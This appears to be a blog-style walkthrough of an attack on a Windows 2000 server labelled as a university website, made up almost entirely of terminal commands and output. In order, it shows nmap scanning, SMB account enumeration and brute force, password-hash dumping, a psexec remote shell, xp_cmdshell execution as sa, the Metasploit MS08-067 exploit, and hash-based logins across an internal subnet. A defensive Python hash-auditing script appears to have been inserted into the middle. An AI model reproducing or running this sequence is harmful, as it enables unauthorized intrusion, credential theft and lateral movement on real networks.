Guangxi Normal University website http://202.103.242.241

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the accounts that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain the users' passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
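The pwdump lines above already tell a password auditor most of what the later brute-force steps confirm. The Python check below is an added example (not from the original post, and not part of Nmap or pwdump): it parses lines in the `user:RID => LM:NT` format shown and flags, per account, a blank password, an LM hash being stored at all, and an LM second half equal to the empty-string constant, which means the password is 7 characters or fewer. The sample input is the transcript's own output, pasted in as a string.

```python
import re

# Sample input: the smb-pwdump lines from the transcript above, in pwdump
# format "user:RID => LM_HASH:NT_HASH" (pasted from the output, not captured live).
SAMPLE = """\
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""

# LM hashing DES-encrypts each 7-character half of the upper-cased password
# separately; the half produced by an empty string is always this constant.
EMPTY_LM_HALF = "AAD3B435B51404EE"

LINE_RE = re.compile(
    r"^\|_?\s*(?P<user>[^:\s]+):(?P<rid>\d+)\s*=>\s*(?P<lm>[^:]+):(?P<nt>.+)$"
)


def audit_pwdump(text):
    """Return {account: [weakness, ...]} for every pwdump line in text."""
    findings = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.rstrip())
        if not m:
            continue  # header lines such as "| smb-pwdump:" carry no RID and are skipped
        lm, nt = m["lm"].strip(), m["nt"].strip()
        issues = []
        if nt.startswith("NO PASSWORD"):
            # pwdump prints this placeholder when the NT hash is that of "".
            issues.append("blank password")
        elif not lm.startswith("NO PASSWORD"):
            # A stored LM hash means a case-folded password of at most 14
            # characters that is cheap to crack; NoLMHash should be enforced.
            issues.append("LM hash stored")
            if lm[16:].upper() == EMPTY_LM_HALF:
                issues.append("password is 7 characters or fewer")
        findings[m["user"]] = issues
    return findings


if __name__ == "__main__":
    for account, issues in audit_pwdump(SAMPLE).items():
        print(f"{account}: {', '.join(issues) or 'no finding'}")
```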
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole    // exploit MS08-067 against the target from msf
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack ~~